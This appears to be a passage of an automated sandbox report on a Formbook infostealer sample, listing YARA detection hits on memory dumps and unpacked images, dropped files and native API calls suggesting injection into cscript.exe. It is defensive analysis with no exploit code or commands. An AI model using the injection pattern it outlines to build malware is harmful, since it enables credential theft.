Source: 8.2.New_1007572_021.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 8.2.New_1007572_021.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 0.2.New_1007572_021.exe.3bc9930.2.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.New_1007572_021.exe.3bc9930.2.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 0.2.New_1007572_021.exe.3d7bea0.5.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.New_1007572_021.exe.3d7bea0.5.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 0.2.New_1007572_021.exe.3d06480.4.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.New_1007572_021.exe.3d06480.4.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000013.00000002.926228324.0000000004F0F000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000013.00000002.926228324.0000000004F0F000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000013.00000002.925005416.0000000000278000.00000004.00000020.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000013.00000002.925005416.0000000000278000.00000004.00000020.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.821727953.0000000001081000.00000020.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.821727953.0000000001081000.00000020.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.821846658.00000000012B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.821846658.00000000012B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.740535210.0000000000404000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000008.00000002.740535210.0000000000404000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000013.00000002.925127682.0000000000490000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000013.00000002.925127682.0000000000490000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000013.00000002.926114786.0000000004BA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000013.00000002.926114786.0000000004BA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000A.00000002.821488799.0000000000E10000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000A.00000002.821488799.0000000000E10000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000013.00000002.925530735.00000000031B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000013.00000002.925530735.00000000031B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.739038576.0000000003BCD000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000000.00000002.739038576.0000000003BCD000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000A.00000000.740219963.0000000001081000.00000020.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000A.00000000.740219963.0000000001081000.00000020.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.739831969.0000000003EBC000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000000.00000002.739831969.0000000003EBC000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.739343756.0000000003D06000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000000.00000002.739343756.0000000003D06000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe, type: DROPPEDMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe, type: DROPPEDMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 10_2_0109A100 NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 10_2_0109A050 NtClose,
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 10_2_01099F20 NtCreateFile,
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 10_2_01099FD0 NtReadFile,
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 10_2_0109A04C NtClose,
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 10_2_0109A0FA NtAllocateVirtualMemory,
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 10_2_01099F1A NtCreateFile,
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 10_2_01099FCA NtReadFile,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D95D0 NtClose,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D9540 NtReadFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D96D0 NtCreateKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D96E0 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D9650 NtQueryValueKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D9660 NtAllocateVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D9780 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D9FE0 NtCreateMutant,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D9710 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D9840 NtDelayExecution,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D9860 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D99A0 NtCreateSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D9A50 NtCreateFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D95F0 NtQueryInformationFile,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D9520 NtWaitForSingleObject,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048DAD30 NtSetContextThread,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D9560 NtWriteFile,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D9610 NtEnumerateValueKey,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D9670 NtQueryInformationProcess,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D97A0 NtUnmapViewOfSection,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048DA710 NtOpenProcessToken,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D9730 NtQueryVirtualMemory,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D9760 NtOpenProcess,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048DA770 NtOpenThread,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D9770 NtSetInformationFile,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D98A0 NtWriteVirtualMemory,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D98F0 NtReadVirtualMemory,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D9820 NtEnumerateKey,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048DB040 NtSuspendThread,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D99D0 NtCreateProcessEx,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D9950 NtQueueApcThread,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D9A80 NtOpenDirectoryObject,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D9A00 NtProtectVirtualMemory,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D9A10 NtQuerySection,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D9A20 NtResumeThread,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048DA3B0 NtGetContextThread,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048D9B00 NtSetValueKey,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_031CA100 NtAllocateVirtualMemory,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_031CA050 NtClose,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_031C9F20 NtCreateFile,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_031C9FD0 NtReadFile,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_031CA04C NtClose,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_031CA0FA NtAllocateVirtualMemory,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_031C9F1A NtCreateFile,
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_031C9FCA NtReadFile,
            Source: C:\Users\user\Desktop\New_1007572_021.exeCode function: 0_2_0109E494
            Source: C:\Users\user\Desktop\New_1007572_021.exeCode function: 0_2_0109F580
            Source: C:\Users\user\Desktop\New_1007572_021.exeCode function: 0_2_0109F590
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 10_2_0109D166
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 10_2_01081030
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 10_2_0109E376
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 10_2_01082D90
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 10_2_0109D773
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 10_2_0109BFA6
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 10_2_01082FB0
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 10_2_01089E30
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeCode function: 10_2_0109E6D5
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048A841F
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0495D466
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C2581
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_049625DD
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048AD5E0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04962D07
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04890D20
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04961D55
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04962EF7
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0495D616
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048B6E30
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04961FF1
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048AB090
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C20A0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_049620A8
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_049628EC
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04951002
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0489F900
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048B4120
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_049622AE
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048CEBB0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_0495DBD2
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_04962B28
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_031CE376
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_031CD166
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_031CD773
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_031B2FB0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_031CBFA6
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_031B9E30
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_031CE6D5
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_031B2D90
            Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 0489B150 appears 35 times
            Source: FB_5908.tmp.exe.8.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: FB_5908.tmp.exe.8.drStatic PE information: No import functions for PE file found
            Source: FB_5E87.tmp.exe.8.drStatic PE information: No import functions for PE file found
            Source: New_1007572_021.exe, 00000000.00000002.747317256.0000000007940000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameYyezikludvdagjmvrozekhz.dll" vs New_1007572_021.exe
            Source: New_1007572_021.exe, 00000000.00000002.746272769.0000000007420000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs New_1007572_021.exe
            Source: New_1007572_021.exe, 00000000.00000002.738790533.0000000002C7C000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameclrjit.dllT vs New_1007572_021.exe
            Source: New_1007572_021.exe, 00000000.00000002.738790533.0000000002C7C000.00000004.00000001.sdmpBinary or memory string: OriginalFilename vs New_1007572_021.exe
            Source: New_1007572_021.exe, 00000000.00000002.737740321.00000000010B0000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs New_1007572_021.exe
            Source: New_1007572_021.exe, 00000000.00000002.739038576.0000000003BCD000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameBindStub.exe vs New_1007572_021.exe
            Source: New_1007572_021.exe, 00000008.00000002.740535210.0000000000404000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameBindStub.exe vs New_1007572_021.exe
            Source: New_1007572_021.exe, 00000008.00000002.743239571.0000000002FD0000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs New_1007572_021.exe
            Source: New_1007572_021.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
            Source: 0.2.New_1007572_021.exe.3eb8b30.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0.2.New_1007572_021.exe.3eb8b30.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 10.2.FB_5E87.tmp.exe.1080000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 10.2.FB_5E87.tmp.exe.1080000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 10.0.FB_5E87.tmp.exe.1080000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 10.0.FB_5E87.tmp.exe.1080000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 8.2.New_1007572_021.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 8.2.New_1007572_021.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0.2.New_1007572_021.exe.3bc9930.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0.2.New_1007572_021.exe.3bc9930.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0.2.New_1007572_021.exe.3d7bea0.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0.2.New_1007572_021.exe.3d7bea0.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0.2.New_1007572_021.exe.3d06480.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0.2.New_1007572_021.exe.3d06480.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000013.00000002.926228324.0000000004F0F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000013.00000002.926228324.0000000004F0F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000013.00000002.925005416.0000000000278000.00000004.00000020.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000013.00000002.925005416.0000000000278000.00000004.00000020.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000A.00000002.821727953.0000000001081000.00000020.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000A.00000002.821727953.0000000001081000.00000020.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000A.00000002.821846658.00000000012B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000A.00000002.821846658.00000000012B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000008.00000002.740535210.0000000000404000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000008.00000002.740535210.0000000000404000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000013.00000002.925127682.0000000000490000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000013.00000002.925127682.0000000000490000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000013.00000002.926114786.0000000004BA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000013.00000002.926114786.0000000004BA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000A.00000002.821488799.0000000000E10000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000A.00000002.821488799.0000000000E10000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000013.00000002.925530735.00000000031B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000013.00000002.925530735.00000000031B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.739038576.0000000003BCD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000000.00000002.739038576.0000000003BCD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000A.00000000.740219963.0000000001081000.00000020.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000A.00000000.740219963.0000000001081000.00000020.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
